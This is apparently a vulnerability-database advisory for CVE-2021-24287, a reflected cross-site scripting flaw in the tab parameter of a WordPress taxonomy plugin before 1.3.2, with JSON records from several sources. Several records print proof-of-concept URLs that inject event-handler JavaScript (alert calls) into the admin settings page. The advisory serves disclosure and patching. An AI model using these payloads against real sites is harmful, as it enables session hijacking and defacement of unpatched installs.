Description
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
### PoC
https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)
Affected Software
Related
{"id": "WPVDB-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF", "type": "wpvulndb", "bulletinFamily": "software", "title": "Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)", "description": "The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue\n\n### PoC\n\nhttps://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=\" onMouseOver=\"alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=\"+style%3D\"animation-name%3Aspinner\"+onanimationstart%3D\"alert(%2FXSS%2F)\n", "published": "2021-04-23T00:00:00", "modified": "2021-04-24T07:01:14", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf", "reporter": "wpvulndb", "references": [], "cvelist": ["CVE-2021-24287"], "immutableFields": [], "lastseen": "2021-05-28T19:33:09", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24287"]}, {"type": "exploitdb", "idList": ["EDB-ID:50349"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164327"]}, {"type": "patchstack", "idList": ["PATCHSTACK:06BF4A273A4DF2BFA7F46994CC76DAD3"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "zdt", "idList": ["1337DAY-ID-36825"]}]}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24287"]}, {"type": "exploitdb", "idList": ["EDB-ID:50349"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164327"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "zdt", "idList": ["1337DAY-ID-36825"]}]}, "exploitation": null, "vulnersScore": 0.0}, "affectedSoftware": [{"version": "1.3.2", "operator": "lt", "name": "select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons"}], "exploit": "https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\" onMouseOver=\"alert(1);\r\n\r\nhttps://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style%3D\"animation-name%3Aspinner\"+onanimationstart%3D\"alert(%2FXSS%2F)", "sourceData": "", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "9051a70425003db96aade56db4cb94bf"}}
{"cve": [{"lastseen": "2022-03-23T14:51:02", "description": "The settings page of the Select All Categories and Taxonomies, Change Checkbox to Radio Buttons WordPress plugin before 1.3.2 did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-14T12:15:00", "type": "cve", "title": "CVE-2021-24287", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-10-18T11:51:00", "cpe": [], "id": "CVE-2021-24287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24287", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:32:27", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin (versions <= 1.3.1).\n\n## Solution\n\n\r\n Update the WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin to the latest available version (at least 1.3.2).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-23T00:00:00", "type": "patchstack", "title": "WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin <= 1.3.1 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-04-23T00:00:00", "id": "PATCHSTACK:06BF4A273A4DF2BFA7F46994CC76DAD3", "href": "https://patchstack.com/database/vulnerability/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/wordpress-select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons-plugin-1-3-1-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-22T15:26:58", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "zdt", "title": "WordPress Select All Categories and Taxonomies 1.3.1 Plugin - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "1337DAY-ID-36825", "href": "https://0day.today/exploit/description/36825", "sourceData": "# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)\n# Author: 0xB9\n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip\n# Version: 1.3.1\n# Tested on: Windows 10\n# CVE: CVE-2021-24287\n\n1. Description:\nThe tab parameter in the Admin Panel is vulnerable to XSS.\n\n2. Proof of Concept:\nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/);\n", "sourceHref": "https://0day.today/exploit/36825", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-09-29T15:03:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "packetstorm", "title": "WordPress Select All Categories And Taxonomies 1.3.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "PACKETSTORM:164327", "href": "https://packetstormsecurity.com/files/164327/WordPress-Select-All-Categories-And-Taxonomies-1.3.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) \n# Date: 2/15/2021 \n# Author: 0xB9 \n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip \n# Version: 1.3.1 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24287 \n \n1. Description: \nThe tab parameter in the Admin Panel is vulnerable to XSS. \n \n2. Proof of Concept: \nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/); \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164327/wpsact131-xss.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-05-28T19:33:09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24287"], "description": "The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue\n", "modified": "2021-04-24T07:01:14", "published": "2021-04-23T00:00:00", "id": "WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF", "href": "", "type": "wpexploit", "title": "Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)", "sourceData": "https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\" onMouseOver=\"alert(1);\r\n\r\nhttps://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style%3D\"animation-name%3Aspinner\"+onanimationstart%3D\"alert(%2FXSS%2F)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-08-10T22:04:38", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24287", "CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "EDB-ID:50349", "href": "https://www.exploit-db.com/exploits/50349", "sourceData": "# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)\r\n# Date: 2/15/2021\r\n# Author: 0xB9\r\n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip\r\n# Version: 1.3.1\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24287\r\n\r\n1. Description:\r\nThe tab parameter in the Admin Panel is vulnerable to XSS.\r\n\r\n2. Proof of Concept:\r\nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/);", "sourceHref": "https://www.exploit-db.com/download/50349", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)
